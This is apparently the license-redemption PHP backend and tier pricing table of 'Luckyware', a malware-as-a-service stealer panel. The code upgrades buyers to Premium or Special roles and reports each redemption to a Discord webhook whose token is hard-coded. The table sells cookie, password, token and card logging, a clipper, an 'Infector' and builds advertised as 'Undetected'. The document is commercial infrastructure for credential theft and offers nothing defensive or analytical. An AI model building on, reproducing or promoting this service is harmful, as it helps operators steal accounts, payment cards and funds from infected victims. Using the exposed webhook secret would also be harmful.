prepare($sqllic); $stmtlic->bind_param("s", $license); $stmtlic->execute(); $resultlic = $stmtlic->get_result(); if ($resultlic->num_rows > 0) { $unxtime = time(); $sqlup = "UPDATE licenses SET OwnerID=?, UsedTime=? WHERE License=?"; $stmtup = $conn->prepare($sqlup); $stmtup->bind_param("sss", $secretkey, $unxtime, $license); $stmtup->execute(); $url = "https://discord.com/api/webhooks/1407709090985017344/6JBg1MMxrKuSWlmiNDYIQi9acOJdBAUcbTWd2AqR-7kikFGblTx2iNB8KvrIcNcu3Vqg"; $headers = ['Content-Type: application/json; charset=utf-8']; $messages = ':orange_heart: ' . $username . ' Just Reedemed license ' . $license . ' :orange_heart:'; $POST = ['username' => 'Logins Logs', 'content' => $messages]; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($POST)); $response = curl_exec($ch); if (startsWith($license, 'LUCKY-P')) { $sql = "UPDATE accounts SET Role='Premium' WHERE OwnerKey=?"; $stmt = $conn->prepare($sql); $stmt->bind_param("s", $secretkey); $_SESSION["Role"] = "Premium"; } if (startsWith($license, 'LUCKY-S')) { $sql = "UPDATE accounts SET Role='Special' WHERE OwnerKey=?"; $stmt = $conn->prepare($sql); $stmt->bind_param("s", $secretkey); $_SESSION["Role"] = "Special"; } if ($stmt->execute()) { header('location:../Dashboard/'); } else { header('location:../Dashboard/'); } } else { echo ""; } } else { echo ""; } } ?>
| Features | Trial (Free) | Premium | Special |
|---|---|---|---|
| Access to Dashboard | |||
| File Execution | |||
| General Information | |||
| Build Updates | Rarely (Likely Detected) | Frequent (Undetected) | Frequent (Undetected) |
| Stub Config | |||
| Cookie Logging | Logged but no access | ||
| Password Logging | Logged but no access | ||
| Token Logging | |||
| Auto Token Checker | |||
| Server Perms Notifications | |||
| Automations | |||
| Clipper | |||
| Cards | Logged but no access | Logged but no access | |
| Luckyware Infector | |||
| API Domains | Shared API Domain | Premium Quality Domains | Private Domains |